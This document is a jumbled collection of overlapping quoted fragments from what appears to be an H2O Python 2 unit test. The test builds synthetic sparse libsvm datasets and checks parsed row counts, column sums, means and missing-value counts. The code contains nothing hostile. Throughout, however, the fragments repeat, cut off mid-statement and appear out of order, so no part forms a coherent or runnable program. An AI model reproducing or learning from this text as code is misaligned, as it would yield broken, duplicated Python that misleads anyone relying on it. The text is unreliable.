sys.maxint) csvFilename = \"syn_%s_%s_%s_%s.csv\" % (SEEDPERFILE, sel, rowCount,", "k should be integers that match the number of cols", "sel, distribution): # we can do all sorts of methods", "one value per row! # is it okay to specify", "constant values, # to see if we have x specified", "'sparse'), ] # h2b.browseTheCloud() for (rowCount, colCount, hex_key, timeoutSecs, distribution)", "(column sums)************************************************* if DO_COMPARE_SUM: h2e.exec_zero_list(zeroList) colResultList = h2e.exec_expr_list_across_cols(None, exprList, selKey2,", "valMin = -1e2 valMax = 1e2 classMin = -36 classMax", "per row! # is it okay to specify col 0", "%s mean %0.6f is not equal to generated mean %0.6f'", "'cC', 300, 'sparse50'), # (100, 40000, 'cD', 300, 'sparse'), ]", "= 36 dsf = open(csvPathname, \"w+\") synColSumDict = {0: 0}", "is the only valid separator # add the output (col", "sums for comparison to exec col sums below (colNumberMax, synColSumDict)", "cols self.assertTrue(k>=0 and k<len(colResultList)) compare = colResultList[k] print \"\\nComparing col", "string if colNumber in synColSumDict: synColSumDict[colNumber] += val # sum", "= h2o_cmd.runInspect(None, parseResult['destination_key'], max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) num_cols = inspect['num_cols'] num_rows =", "tone goodX = h2o_glm.goodXFromColumnInfo(y=0, key=parseResult['destination_key'], timeoutSecs=300, noPrint=True) if DO_SUMMARY: summaryResult", "= float(inspect['cols'][k]['mean']) # our fp formats in the syn generation", "places=0, msg='%0.6f col sum is not equal to expected %0.6f'", "# been done in same order, so maybe the comparison", "= 0', ] # the first column should use this", "write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel, distribution) selKey2 = hex_key +", "to fix this for compare to expected # we should", "colCount with random, we might fall short # track what", "expected # we should be able to keep the list", "range. so we don't print zeroes for svm! if (val", "val and (colNumber > colNumberMax): colNumberMax = colNumber else: #", "valMin, valMax, rowData, synColSumDict): # colNumber should not be 0,", "sys.path.extend(['.','..','py']) import h2o, h2o_cmd, h2o_hosts, h2o_browse as h2b, h2o_import as", "values, constant values, # to see if we have x", "we really got colNumberMax = 0 for i in range(rowCount):", "(colNumber > colNumberMax): colNumberMax = colNumber # always need an", "r.triangular(valMin,valMax,0) valFormatted = h2o_util.fp_format(val, sel) # force it to be", "comparison can be exact (or not!) self.assertAlmostEqual(v, compare, places=0, msg='%0.6f", "and (colNumber > colNumberMax): colNumberMax = colNumber # always need", "we have x specified well # figures out everything from", "num_rows = inspect['num_rows'] print \"\\n\" + csvFilename # SUMMARY**************************************** #", "synColSumDict: synColSumDict[colNumber] += val # sum of column (dict) else:", "if (localhost): h2o.build_cloud(2,java_heap_GB=5) else: h2o_hosts.build_cloud_with_hosts() @classmethod def tearDownClass(cls): h2o.tear_down_cloud() def", "DO_SUMMARY = False DO_COMPARE_SUM = False def write_syn_dataset(csvPathname, rowCount, colCount,", "no cols are non-zero # space is the only valid", "val and (colNumber > colNumberMax): colNumberMax = colNumber # always", "# force it to be zero in this range. so", "(colNumberMax+1, num_cols)) # Exec (column sums)************************************************* if DO_COMPARE_SUM: h2e.exec_zero_list(zeroList) colResultList", "] # h2b.browseTheCloud() for (rowCount, colCount, hex_key, timeoutSecs, distribution) in", "max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) h2o_cmd.infoFromSummary(summaryResult, noPrint=True) self.assertEqual(colNumberMax+1, num_cols, msg=\"generated %s cols (including", "exec col sums below (colNumberMax, synColSumDict) = write_syn_dataset(csvPathname, rowCount, colCount,", "exprList, selKey2, maxCol=colNumberMax+1, timeoutSecs=timeoutSecs) print \"\\n*************\" print \"colResultList\", colResultList print", "valFormatted) # f should always return string if colNumber in", "as h2i, h2o_exec as h2e, h2o_glm import h2o_util zeroList =", "= (v + 0.0)/rowCount # enums don't have mean, but", "see if we have x specified well # figures out", "the configs have the same y..just check with the firs", "parsed to %s rows\" % (rowCount, num_rows)) # need to", "zeroes for svm! if (val > valMin/2) and (val <", "as h2e, h2o_glm import h2o_util zeroList = [ 'Result0 =", "classMax = 36 dsf = open(csvPathname, \"w+\") synColSumDict = {0:", "# space is the only valid separator # add the", "the list of fp sums per col above # when", "float(inspect['cols'][k]['mean']) # our fp formats in the syn generation sometimes", "return val valMin = -1e2 valMax = 1e2 classMin =", "print \"\\n*************\" print \"colResultList\", colResultList print \"*************\" self.assertEqual(rowCount, num_rows, msg=\"generated", "% (v, compare)) synMean = (v + 0.0)/rowCount # enums", "time:', parseResult['response']['time'] print \"Parse result['destination_key']:\", parseResult['destination_key'] inspect = h2o_cmd.runInspect(None, parseResult['destination_key'],", "we might fall short # track what max we really", "40000, 'cD', 300, 'sparse'), ] # h2b.browseTheCloud() for (rowCount, colCount,", "\"\\n*************\" print \"colResultList\", colResultList print \"*************\" self.assertEqual(rowCount, num_rows, msg=\"generated %s", "# h2b.browseTheCloud() SYNDATASETS_DIR = h2o.make_syn_dir() tryList = [ (100, 10000,", "compare)) synMean = (v + 0.0)/rowCount # enums don't have", "print \"\\nsynColSumDict:\", synColSumDict for k,v in synColSumDict.iteritems(): if DO_COMPARE_SUM: #", "# we should be able to keep the list of", "h2o.tear_down_cloud() def test_many_fp_formats_libsvm_2(self): # h2b.browseTheCloud() SYNDATASETS_DIR = h2o.make_syn_dir() tryList =", "per col above # when we generate the dataset ###", "= val # sum of column (dict) return val valMin", "mean, synMean)) num_missing_values = inspect['cols'][k]['num_missing_values'] self.assertEqual(0, num_missing_values, msg='col %s num_missing_values", "are non-zero # space is the only valid separator #", "for (rowCount, colCount, hex_key, timeoutSecs, distribution) in tryList: NUM_CASES =", "rowData.insert(0, val) synColSumDict[0] += val # sum of column (dict)", "localhost SEED = h2o.setup_random_seed() localhost = h2o.decide_if_localhost() if (localhost): h2o.build_cloud(2,java_heap_GB=5)", "val = addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict) if val and", "colNumber in synColSumDict: synColSumDict[colNumber] += val # sum of column", "random, we might fall short # track what max we", "val = r.uniform(MIN,MAX) val = r.triangular(valMin,valMax,0) valFormatted = h2o_util.fp_format(val, sel)", "if d==0: if distribution == 'sparse': # only one value", "values per row.. 50% or so? for colNumber in range(1,", "values, # to see if we have x specified well", "to expected # we should be able to keep the", "(rowCount, num_rows)) # need to fix this for compare to", "if DO_SUMMARY: summaryResult = h2o_cmd.runSummary(key=selKey2, max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) h2o_cmd.infoFromSummary(summaryResult, noPrint=True) self.assertEqual(colNumberMax+1,", "it's a libsvm..doesn't detect automatically\" parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=selKey2,", "\"\\n\" + csvFilename # SUMMARY**************************************** # gives us some reporting", "because the output will be there ## val = r.uniform(MIN,MAX)", "same y..just check with the firs tone goodX = h2o_glm.goodXFromColumnInfo(y=0,", "= h2o.make_syn_dir() tryList = [ (100, 10000, 'cA', 300, 'sparse50'),", "self.assertAlmostEqual(v, compare, places=0, msg='%0.6f col sum is not equal to", "not equal to generated mean %0.6f' % (k, mean, synMean))", "a val? if val and (colNumber > colNumberMax): colNumberMax =", "fp sums per col above # when we generate the", "0', ] # the first column should use this exprList", "synColSumDict): # colNumber should not be 0, because the output", "csvPathname = SYNDATASETS_DIR + '/' + csvFilename print \"Creating random\",", "# (100, 40000, 'cD', 300, 'sparse'), ] # h2b.browseTheCloud() for", "the comparison can be exact (or not!) self.assertAlmostEqual(v, compare, places=0,", "val) synColSumDict[0] += val # sum of column (dict) rowDataCsv", "= h2o_util.fp_format() for sel in [random.randint(0,NUM_CASES-1)]: # len(caseList) SEEDPERFILE =", "off the r object r = random.Random(SEEDPERFILE) def addRandValToRowStuff(colNumber, valMin,", "generation sometimes only have two places? self.assertAlmostEqual(mean, synMean, places=0, msg='col", "num_missing_values %d should be 0' % (k, num_missing_values)) if __name__", "h2o_import as h2i, h2o_exec as h2e, h2o_glm import h2o_util zeroList", "it okay to specify col 0 in svm? where does", "colNumberMax): colNumberMax = colNumber # always need an output class,", "= random.Random(SEEDPERFILE) def addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict): # colNumber", "random.Random(SEEDPERFILE) def addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict): # colNumber should", "msg='col %s mean %0.6f is not equal to generated mean", "# the first column should use this exprList = [", "with random, we might fall short # track what max", "to get a max colCount with random, we might fall", "h2b, h2o_import as h2i, h2o_exec as h2e, h2o_glm import h2o_util", "specify col 0 in svm? where does the output data", "if val and (colNumber > colNumberMax): colNumberMax = colNumber else:", "return string if colNumber in synColSumDict: synColSumDict[colNumber] += val #", "localhost = h2o.decide_if_localhost() if (localhost): h2o.build_cloud(2,java_heap_GB=5) else: h2o_hosts.build_cloud_with_hosts() @classmethod def", "random.randint(1, colCount) val = addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict) #", "firs tone goodX = h2o_glm.goodXFromColumnInfo(y=0, key=parseResult['destination_key'], timeoutSecs=300, noPrint=True) if DO_SUMMARY:", "schema='put', hex_key=selKey2, timeoutSecs=timeoutSecs, doSummary=False, parser_type='SVMLight') print csvFilename, 'parse time:', parseResult['response']['time']", "% (colNumberMax+1, num_cols)) # Exec (column sums)************************************************* if DO_COMPARE_SUM: h2e.exec_zero_list(zeroList)", "col above # when we generate the dataset ### print", "if (val > valMin/2) and (val < valMax/2): return None", "row.. 50% or so? for colNumber in range(1, colCount+1): val", "if we have x specified well # figures out everything", "range(rowCount): rowData = [] d = random.randint(0,2) if d==0: if", "msg=\"generated %s cols (including output). parsed to %s cols\" %", "= h2o.decide_if_localhost() if (localhost): h2o.build_cloud(2,java_heap_GB=5) else: h2o_hosts.build_cloud_with_hosts() @classmethod def tearDownClass(cls):", "and k<len(colResultList)) compare = colResultList[k] print \"\\nComparing col sums:\", v,", "synMean, places=0, msg='col %s mean %0.6f is not equal to", "open(csvPathname, \"w+\") synColSumDict = {0: 0} # guaranteed to have", "do all sorts of methods off the r object r", "skip some rows. only write 1/3 dsf.write(rowDataCsv + \"\\n\") dsf.close()", "we don't print zeroes for svm! if (val > valMin/2)", "SYNDATASETS_DIR = h2o.make_syn_dir() tryList = [ (100, 10000, 'cA', 300,", "num_cols = inspect['num_cols'] num_rows = inspect['num_rows'] print \"\\n\" + csvFilename", "use this exprList = [ 'Result<n> = sum(<keyX>[<col1>])', ] DO_SUMMARY", "def write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel, distribution): # we can", "-1e2 valMax = 1e2 classMin = -36 classMax = 36", "class Basic(unittest.TestCase): def tearDown(self): h2o.check_sandbox_for_errors() @classmethod def setUpClass(cls): global SEED,", "value per row! # is it okay to specify col", "noPrint=True) if DO_SUMMARY: summaryResult = h2o_cmd.runSummary(key=selKey2, max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) h2o_cmd.infoFromSummary(summaryResult, noPrint=True)", "(100, 10000, 'cB', 300, 'sparse'), # (100, 40000, 'cC', 300,", "write 1/3 dsf.write(rowDataCsv + \"\\n\") dsf.close() return (colNumberMax, synColSumDict) class", "assume all the configs have the same y..just check with", "colCount+1): val = addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict) if val", "and (val < valMax/2): return None else: rowData.append(str(colNumber) + \":\"", "col 0 for output # even though we try to", "= [ (100, 10000, 'cA', 300, 'sparse50'), (100, 10000, 'cB',", "%s rows\" % (rowCount, num_rows)) # need to fix this", "an output class, even if no cols are non-zero #", "output data go? (col 0) colNumber = random.randint(1, colCount) val", "have mean, but we're not enums mean = float(inspect['cols'][k]['mean']) #", "(dict) return val valMin = -1e2 valMax = 1e2 classMin", "fall short # track what max we really got colNumberMax", "telling h2o parse it's a libsvm..doesn't detect automatically\" parseResult =", "colResultList print \"*************\" self.assertEqual(rowCount, num_rows, msg=\"generated %s rows, parsed to", "+ \"\\n\") dsf.close() return (colNumberMax, synColSumDict) class Basic(unittest.TestCase): def tearDown(self):", "h2o_cmd.infoFromSummary(summaryResult, noPrint=True) self.assertEqual(colNumberMax+1, num_cols, msg=\"generated %s cols (including output). parsed", "# (100, 40000, 'cC', 300, 'sparse50'), # (100, 40000, 'cD',", "rowData, synColSumDict) # did we add a val? if val", "rows. only write 1/3 dsf.write(rowDataCsv + \"\\n\") dsf.close() return (colNumberMax,", "inspect['num_rows'] print \"\\n\" + csvFilename # SUMMARY**************************************** # gives us", "should not be 0, because the output will be there", "places? self.assertAlmostEqual(mean, synMean, places=0, msg='col %s mean %0.6f is not", "detect automatically\" parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=selKey2, timeoutSecs=timeoutSecs, doSummary=False, parser_type='SVMLight')", "all the configs have the same y..just check with the", "of methods off the r object r = random.Random(SEEDPERFILE) def", "even though we try to get a max colCount with", "'/' + csvFilename print \"Creating random\", csvPathname # dict of", "the firs tone goodX = h2o_glm.goodXFromColumnInfo(y=0, key=parseResult['destination_key'], timeoutSecs=300, noPrint=True) if", "synColSumDict) # did we add a val? if val and", "= sum(<keyX>[<col1>])', ] DO_SUMMARY = False DO_COMPARE_SUM = False def", "+= val # sum of column (dict) rowDataCsv = \"", "(col 0) colNumber = random.randint(1, colCount) val = addRandValToRowStuff(colNumber, valMin,", "in the syn generation sometimes only have two places? self.assertAlmostEqual(mean,", "syn generation sometimes only have two places? self.assertAlmostEqual(mean, synMean, places=0,", "random.randint(0,2) if d==0: if distribution == 'sparse': # only one", "h2o_glm.goodXFromColumnInfo(y=0, key=parseResult['destination_key'], timeoutSecs=300, noPrint=True) if DO_SUMMARY: summaryResult = h2o_cmd.runSummary(key=selKey2, max_column_display=colNumberMax+1,", "'parse time:', parseResult['response']['time'] print \"Parse result['destination_key']:\", parseResult['destination_key'] inspect = h2o_cmd.runInspect(None,", "k<len(colResultList)) compare = colResultList[k] print \"\\nComparing col sums:\", v, compare", "try to get a max colCount with random, we might", "valMax, rowData, synColSumDict) # did we add a val? if", "synColSumDict[colNumber] += val # sum of column (dict) else: synColSumDict[colNumber]", "well # figures out everything from parseResult['destination_key'] # needs y", "f should always return string if colNumber in synColSumDict: synColSumDict[colNumber]", "so maybe the comparison can be exact (or not!) self.assertAlmostEqual(v,", "(val < valMax/2): return None else: rowData.append(str(colNumber) + \":\" +", "\"*************\" self.assertEqual(rowCount, num_rows, msg=\"generated %s rows, parsed to %s rows\"", "col sums below (colNumberMax, synColSumDict) = write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE,", "val = r.triangular(valMin,valMax,0) valFormatted = h2o_util.fp_format(val, sel) # force it", "we try to get a max colCount with random, we", "= h2e.exec_expr_list_across_cols(None, exprList, selKey2, maxCol=colNumberMax+1, timeoutSecs=timeoutSecs) print \"\\n*************\" print \"colResultList\",", "Even though we're comparing floating point sums, the operations probably", "in range(1, colCount+1): val = addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict)", "(which can be index or name) # assume all the", "print \"*************\" self.assertEqual(rowCount, num_rows, msg=\"generated %s rows, parsed to %s", "in [random.randint(0,NUM_CASES-1)]: # len(caseList) SEEDPERFILE = random.randint(0, sys.maxint) csvFilename =", "print \"colResultList\", colResultList print \"*************\" self.assertEqual(rowCount, num_rows, msg=\"generated %s rows,", "gives us some reporting on missing values, constant values, #", "tryList: NUM_CASES = h2o_util.fp_format() for sel in [random.randint(0,NUM_CASES-1)]: # len(caseList)", "= {0: 0} # guaranteed to have col 0 for", "'cA', 300, 'sparse50'), (100, 10000, 'cB', 300, 'sparse'), # (100,", "= [ 'Result0 = 0', ] # the first column", "time sys.path.extend(['.','..','py']) import h2o, h2o_cmd, h2o_hosts, h2o_browse as h2b, h2o_import", "# FIX! vary the eol ? # randomly skip some", "avoid output column (which can be index or name) #", "< valMax/2): return None else: rowData.append(str(colNumber) + \":\" + valFormatted)", "is not equal to generated mean %0.6f' % (k, mean,", "> colNumberMax): colNumberMax = colNumber # always need an output", "(val > valMin/2) and (val < valMax/2): return None else:", "from parseResult['destination_key'] # needs y to avoid output column (which", "output # even though we try to get a max", "\"This dataset requires telling h2o parse it's a libsvm..doesn't detect", "timeoutSecs=300, noPrint=True) if DO_SUMMARY: summaryResult = h2o_cmd.runSummary(key=selKey2, max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) h2o_cmd.infoFromSummary(summaryResult,", "exact (or not!) self.assertAlmostEqual(v, compare, places=0, msg='%0.6f col sum is", "] # the first column should use this exprList =", "# SUMMARY**************************************** # gives us some reporting on missing values,", "setUpClass(cls): global SEED, localhost SEED = h2o.setup_random_seed() localhost = h2o.decide_if_localhost()", "num_missing_values, msg='col %s num_missing_values %d should be 0' % (k,", "colNumberMax = 0 for i in range(rowCount): rowData = []", "else: rowData.append(str(colNumber) + \":\" + valFormatted) # f should always", "dsf = open(csvPathname, \"w+\") synColSumDict = {0: 0} # guaranteed", "import h2o_util zeroList = [ 'Result0 = 0', ] #", "0 in svm? where does the output data go? (col", "output). parsed to %s cols\" % (colNumberMax+1, num_cols)) # Exec", "selKey2, maxCol=colNumberMax+1, timeoutSecs=timeoutSecs) print \"\\n*************\" print \"colResultList\", colResultList print \"*************\"", "(rowCount, colCount, hex_key, timeoutSecs, distribution) in tryList: NUM_CASES = h2o_util.fp_format()", "equal to expected %0.6f' % (v, compare)) synMean = (v", "add the output (col 0) # random integer for class", "comparison to exec col sums below (colNumberMax, synColSumDict) = write_syn_dataset(csvPathname,", "= write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel, distribution) selKey2 = hex_key", "svm? where does the output data go? (col 0) colNumber", "not be 0, because the output will be there ##", "random.randint(0, sys.maxint) csvFilename = \"syn_%s_%s_%s_%s.csv\" % (SEEDPERFILE, sel, rowCount, colCount)", "mean, but we're not enums mean = float(inspect['cols'][k]['mean']) # our", "40000, 'cC', 300, 'sparse50'), # (100, 40000, 'cD', 300, 'sparse'),", "can be index or name) # assume all the configs", "# colNumber should not be 0, because the output will", "be index or name) # assume all the configs have", "compare = colResultList[k] print \"\\nComparing col sums:\", v, compare #", "self.assertAlmostEqual(mean, synMean, places=0, msg='col %s mean %0.6f is not equal", "to exec col sums below (colNumberMax, synColSumDict) = write_syn_dataset(csvPathname, rowCount,", "parser_type='SVMLight') print csvFilename, 'parse time:', parseResult['response']['time'] print \"Parse result['destination_key']:\", parseResult['destination_key']", "of values per row.. 50% or so? for colNumber in", "in range(rowCount): rowData = [] d = random.randint(0,2) if d==0:", "if colNumber in synColSumDict: synColSumDict[colNumber] += val # sum of", "rowCount, colCount, SEEDPERFILE, sel, distribution) selKey2 = hex_key + \"_\"", "fp formats in the syn generation sometimes only have two", "300, 'sparse'), # (100, 40000, 'cC', 300, 'sparse50'), # (100,", "# dict of col sums for comparison to exec col", "# we can do all sorts of methods off the", "rowData.append(str(colNumber) + \":\" + valFormatted) # f should always return", "\":\" + valFormatted) # f should always return string if", "h2o parse it's a libsvm..doesn't detect automatically\" parseResult = h2i.import_parse(path=csvPathname,", "val? if val and (colNumber > colNumberMax): colNumberMax = colNumber", "h2e.exec_expr_list_across_cols(None, exprList, selKey2, maxCol=colNumberMax+1, timeoutSecs=timeoutSecs) print \"\\n*************\" print \"colResultList\", colResultList", "okay to specify col 0 in svm? where does the", "= False def write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel, distribution): #", "h2o_util.fp_format(val, sel) # force it to be zero in this", "'Result<n> = sum(<keyX>[<col1>])', ] DO_SUMMARY = False DO_COMPARE_SUM = False", "else: synColSumDict[colNumber] = val # sum of column (dict) return", "def test_many_fp_formats_libsvm_2(self): # h2b.browseTheCloud() SYNDATASETS_DIR = h2o.make_syn_dir() tryList = [", "need to fix this for compare to expected # we", "r.uniform(MIN,MAX) val = r.triangular(valMin,valMax,0) valFormatted = h2o_util.fp_format(val, sel) # force", "<reponame>vkuznet/h2o import unittest, random, sys, time sys.path.extend(['.','..','py']) import h2o, h2o_cmd,", "not enums mean = float(inspect['cols'][k]['mean']) # our fp formats in", "= inspect['num_cols'] num_rows = inspect['num_rows'] print \"\\n\" + csvFilename #", "two places? self.assertAlmostEqual(mean, synMean, places=0, msg='col %s mean %0.6f is", "1e2 classMin = -36 classMax = 36 dsf = open(csvPathname,", "h2b.browseTheCloud() for (rowCount, colCount, hex_key, timeoutSecs, distribution) in tryList: NUM_CASES", "False def write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel, distribution): # we", "# sum of column (dict) else: synColSumDict[colNumber] = val #", "tearDown(self): h2o.check_sandbox_for_errors() @classmethod def setUpClass(cls): global SEED, localhost SEED =", "\"Parse result['destination_key']:\", parseResult['destination_key'] inspect = h2o_cmd.runInspect(None, parseResult['destination_key'], max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) num_cols", "synMean = (v + 0.0)/rowCount # enums don't have mean,", "NUM_CASES = h2o_util.fp_format() for sel in [random.randint(0,NUM_CASES-1)]: # len(caseList) SEEDPERFILE", "this for compare to expected # we should be able", "sums:\", v, compare # Even though we're comparing floating point", "sel, rowCount, colCount) csvPathname = SYNDATASETS_DIR + '/' + csvFilename", "+ 0.0)/rowCount # enums don't have mean, but we're not", "addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict) if val and (colNumber >", "# add the output (col 0) # random integer for", "h2o.make_syn_dir() tryList = [ (100, 10000, 'cA', 300, 'sparse50'), (100,", "floating point sums, the operations probably should have # been", "places=0, msg='col %s mean %0.6f is not equal to generated", "be able to keep the list of fp sums per", "of column (dict) rowDataCsv = \" \".join(map(str,rowData)) # FIX! vary", "parseResult['response']['time'] print \"Parse result['destination_key']:\", parseResult['destination_key'] inspect = h2o_cmd.runInspect(None, parseResult['destination_key'], max_column_display=colNumberMax+1,", "h2o.decide_if_localhost() if (localhost): h2o.build_cloud(2,java_heap_GB=5) else: h2o_hosts.build_cloud_with_hosts() @classmethod def tearDownClass(cls): h2o.tear_down_cloud()", "+ \"_\" + str(sel) print \"This dataset requires telling h2o", "some rows. only write 1/3 dsf.write(rowDataCsv + \"\\n\") dsf.close() return", "have col 0 for output # even though we try", "colCount, hex_key, timeoutSecs, distribution) in tryList: NUM_CASES = h2o_util.fp_format() for", "= inspect['num_rows'] print \"\\n\" + csvFilename # SUMMARY**************************************** # gives", "# sum of column (dict) rowDataCsv = \" \".join(map(str,rowData)) #", "(colNumberMax, synColSumDict) class Basic(unittest.TestCase): def tearDown(self): h2o.check_sandbox_for_errors() @classmethod def setUpClass(cls):", "== 'sparse': # only one value per row! # is", "colCount) val = addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict) # did", "for output # even though we try to get a", "so? for colNumber in range(1, colCount+1): val = addRandValToRowStuff(colNumber, valMin,", "randomly skip some rows. only write 1/3 dsf.write(rowDataCsv + \"\\n\")", "d = random.randint(0,2) if d==0: if distribution == 'sparse': #", "msg='%0.6f col sum is not equal to expected %0.6f' %", "# assume all the configs have the same y..just check", "r object r = random.Random(SEEDPERFILE) def addRandValToRowStuff(colNumber, valMin, valMax, rowData,", "y..just check with the firs tone goodX = h2o_glm.goodXFromColumnInfo(y=0, key=parseResult['destination_key'],", "in tryList: NUM_CASES = h2o_util.fp_format() for sel in [random.randint(0,NUM_CASES-1)]: #", "the r object r = random.Random(SEEDPERFILE) def addRandValToRowStuff(colNumber, valMin, valMax,", "dict of col sums for comparison to exec col sums", "36 dsf = open(csvPathname, \"w+\") synColSumDict = {0: 0} #", "class val = random.randint(classMin,classMax) rowData.insert(0, val) synColSumDict[0] += val #", "so we don't print zeroes for svm! if (val >", "valid separator # add the output (col 0) # random", "hex_key, timeoutSecs, distribution) in tryList: NUM_CASES = h2o_util.fp_format() for sel", "synColSumDict) = write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel, distribution) selKey2 =", "fix this for compare to expected # we should be", "# randomly skip some rows. only write 1/3 dsf.write(rowDataCsv +", "%d should be 0' % (k, num_missing_values)) if __name__ ==", "0 for output # even though we try to get", "\"syn_%s_%s_%s_%s.csv\" % (SEEDPERFILE, sel, rowCount, colCount) csvPathname = SYNDATASETS_DIR +", "same order, so maybe the comparison can be exact (or", "valMin, valMax, rowData, synColSumDict) if val and (colNumber > colNumberMax):", "# guaranteed to have col 0 for output # even", "a max colCount with random, we might fall short #", "check with the firs tone goodX = h2o_glm.goodXFromColumnInfo(y=0, key=parseResult['destination_key'], timeoutSecs=300,", "guaranteed to have col 0 for output # even though", "have two places? self.assertAlmostEqual(mean, synMean, places=0, msg='col %s mean %0.6f", "not equal to expected %0.6f' % (v, compare)) synMean =", "= colNumber # always need an output class, even if", "object r = random.Random(SEEDPERFILE) def addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict):", "always need an output class, even if no cols are", "0 for i in range(rowCount): rowData = [] d =", "print \"\\nComparing col sums:\", v, compare # Even though we're", "h2o_util.fp_format() for sel in [random.randint(0,NUM_CASES-1)]: # len(caseList) SEEDPERFILE = random.randint(0,", "else: h2o_hosts.build_cloud_with_hosts() @classmethod def tearDownClass(cls): h2o.tear_down_cloud() def test_many_fp_formats_libsvm_2(self): # h2b.browseTheCloud()", "# len(caseList) SEEDPERFILE = random.randint(0, sys.maxint) csvFilename = \"syn_%s_%s_%s_%s.csv\" %", "mean %0.6f' % (k, mean, synMean)) num_missing_values = inspect['cols'][k]['num_missing_values'] self.assertEqual(0,", "enums don't have mean, but we're not enums mean =", "been done in same order, so maybe the comparison can", "> colNumberMax): colNumberMax = colNumber else: # some number of", "= colNumber else: # some number of values per row..", "key=parseResult['destination_key'], timeoutSecs=300, noPrint=True) if DO_SUMMARY: summaryResult = h2o_cmd.runSummary(key=selKey2, max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs)", "summaryResult = h2o_cmd.runSummary(key=selKey2, max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs) h2o_cmd.infoFromSummary(summaryResult, noPrint=True) self.assertEqual(colNumberMax+1, num_cols, msg=\"generated", "timeoutSecs=timeoutSecs) print \"\\n*************\" print \"colResultList\", colResultList print \"*************\" self.assertEqual(rowCount, num_rows,", "formats in the syn generation sometimes only have two places?", "(colNumberMax, synColSumDict) = write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel, distribution) selKey2", "%0.6f is not equal to generated mean %0.6f' % (k,", "synColSumDict = {0: 0} # guaranteed to have col 0", "print zeroes for svm! if (val > valMin/2) and (val", "got colNumberMax = 0 for i in range(rowCount): rowData =", "= SYNDATASETS_DIR + '/' + csvFilename print \"Creating random\", csvPathname", "h2o_hosts.build_cloud_with_hosts() @classmethod def tearDownClass(cls): h2o.tear_down_cloud() def test_many_fp_formats_libsvm_2(self): # h2b.browseTheCloud() SYNDATASETS_DIR", "needs y to avoid output column (which can be index", "below (colNumberMax, synColSumDict) = write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel, distribution)", "can do all sorts of methods off the r object", "= inspect['cols'][k]['num_missing_values'] self.assertEqual(0, num_missing_values, msg='col %s num_missing_values %d should be", "= -1e2 valMax = 1e2 classMin = -36 classMax =", "go? (col 0) colNumber = random.randint(1, colCount) val = addRandValToRowStuff(colNumber,", "%s cols (including output). parsed to %s cols\" % (colNumberMax+1,", "of column (dict) return val valMin = -1e2 valMax =", "operations probably should have # been done in same order,", "rowData = [] d = random.randint(0,2) if d==0: if distribution", "= h2o.setup_random_seed() localhost = h2o.decide_if_localhost() if (localhost): h2o.build_cloud(2,java_heap_GB=5) else: h2o_hosts.build_cloud_with_hosts()", "10000, 'cB', 300, 'sparse'), # (100, 40000, 'cC', 300, 'sparse50'),", "valMin/2) and (val < valMax/2): return None else: rowData.append(str(colNumber) +", "(100, 40000, 'cC', 300, 'sparse50'), # (100, 40000, 'cD', 300,", "cols are non-zero # space is the only valid separator", "val = random.randint(classMin,classMax) rowData.insert(0, val) synColSumDict[0] += val # sum", "random, sys, time sys.path.extend(['.','..','py']) import h2o, h2o_cmd, h2o_hosts, h2o_browse as", "sel, distribution) selKey2 = hex_key + \"_\" + str(sel) print", "valFormatted = h2o_util.fp_format(val, sel) # force it to be zero", "= \" \".join(map(str,rowData)) # FIX! vary the eol ? #", "colResultList = h2e.exec_expr_list_across_cols(None, exprList, selKey2, maxCol=colNumberMax+1, timeoutSecs=timeoutSecs) print \"\\n*************\" print", "synColSumDict) class Basic(unittest.TestCase): def tearDown(self): h2o.check_sandbox_for_errors() @classmethod def setUpClass(cls): global", "sums, the operations probably should have # been done in", "SEED, localhost SEED = h2o.setup_random_seed() localhost = h2o.decide_if_localhost() if (localhost):", "should have # been done in same order, so maybe", "to see if we have x specified well # figures", "the output will be there ## val = r.uniform(MIN,MAX) val", "'sparse50'), (100, 10000, 'cB', 300, 'sparse'), # (100, 40000, 'cC',", "return None else: rowData.append(str(colNumber) + \":\" + valFormatted) # f", "in svm? where does the output data go? (col 0)", "sys.maxint) csvFilename = \"syn_%s_%s_%s_%s.csv\" % (SEEDPERFILE, sel, rowCount, colCount) csvPathname", "probably should have # been done in same order, so", "num_cols, msg=\"generated %s cols (including output). parsed to %s cols\"", "generate the dataset ### print \"\\nsynColSumDict:\", synColSumDict for k,v in", "h2i, h2o_exec as h2e, h2o_glm import h2o_util zeroList = [", "to generated mean %0.6f' % (k, mean, synMean)) num_missing_values =", "to keep the list of fp sums per col above", "print csvFilename, 'parse time:', parseResult['response']['time'] print \"Parse result['destination_key']:\", parseResult['destination_key'] inspect", "don't have mean, but we're not enums mean = float(inspect['cols'][k]['mean'])", "row! # is it okay to specify col 0 in", "] DO_SUMMARY = False DO_COMPARE_SUM = False def write_syn_dataset(csvPathname, rowCount,", "where does the output data go? (col 0) colNumber =", "valMax, rowData, synColSumDict): # colNumber should not be 0, because", "expected %0.6f' % (v, compare)) synMean = (v + 0.0)/rowCount", "valMax, rowData, synColSumDict) if val and (colNumber > colNumberMax): colNumberMax", 